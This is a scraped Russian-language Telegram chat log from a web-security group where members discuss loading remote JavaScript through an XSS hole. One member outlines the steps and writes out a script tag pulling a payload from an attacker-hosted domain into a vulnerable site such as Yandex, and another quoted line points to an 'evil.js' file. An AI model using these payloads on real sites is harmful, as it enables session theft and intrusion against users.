Size: a a a

2020 May 11

P

Pulsar in WebPwnChat
ирония это
источник

P

PP in WebPwnChat
он же написал
"и на своем эвил сайте разместить xss пейлоад"
источник

I

Ivan in WebPwnChat
странные у тебя шутки
источник

P

PP in WebPwnChat
"xss пейлоад"
источник

I

Ivan in WebPwnChat
ты собираешься у себя хостить пейлоад, а инклудить на уязвимом сайте?
источник

P

Pulsar in WebPwnChat
я уточнял реальность такого вектора, насколько это может сработать. есть ли смысл заморачиватся с тестами на реальном сайте, просто уже предварительно у некоторых  людей из чата в лс спрашивал некоторые вещи, объяснили так, что даже тестить не пришлось
источник

P

Pulsar in WebPwnChat
Ivan
ты собираешься у себя хостить пейлоад, а инклудить на уязвимом сайте?
так и получается
источник

I

Ivan in WebPwnChat
короч

1. у себя хостишь "вредоносный" JS с например пейлоадом XSS Hunter
2. находишь хсс в Яндексе, но места мало, весь код Хантера не влезет
3. делаешь хсску "<script src=//pulsar.ru/1.js"></script>
4. JS  подключится с твоего сайта и исполнится в контексте яндекса
источник

P

Pulsar in WebPwnChat
в целом так и думал кроме яндекса и хантера
источник

P

Pulsar in WebPwnChat
т.е. всё таки норм идея. спасибо
источник

А

Алексей in WebPwnChat
Pulsar
т.е. всё таки норм идея. спасибо
Поздравляю с открытием stored xss
источник

I0

Iframe 0x01 in WebPwnChat
Алексей
Поздравляю с открытием stored xss
Это не blind)
источник

P

Pulsar in WebPwnChat
каким местом это блайнд?
источник

А

Алексей in WebPwnChat
Pulsar
можно ли через html inj засунуть в код страницы ссылку на js файл типа <script src="site.com/evil.js> и на своем эвил сайте разместить xss пейлоад?
<script src>?
источник

GD

Green Dog in WebPwnChat
лоло
источник

P

Pulsar in WebPwnChat
такая же реакция)
источник

GD

Green Dog in WebPwnChat
double blind self-xss
источник

P

Pulsar in WebPwnChat
это сильно. можно подробнее?!
источник

P

PP in WebPwnChat
double penetration
источник

I

Ivan in WebPwnChat
double injection

penetration это по другой части
источник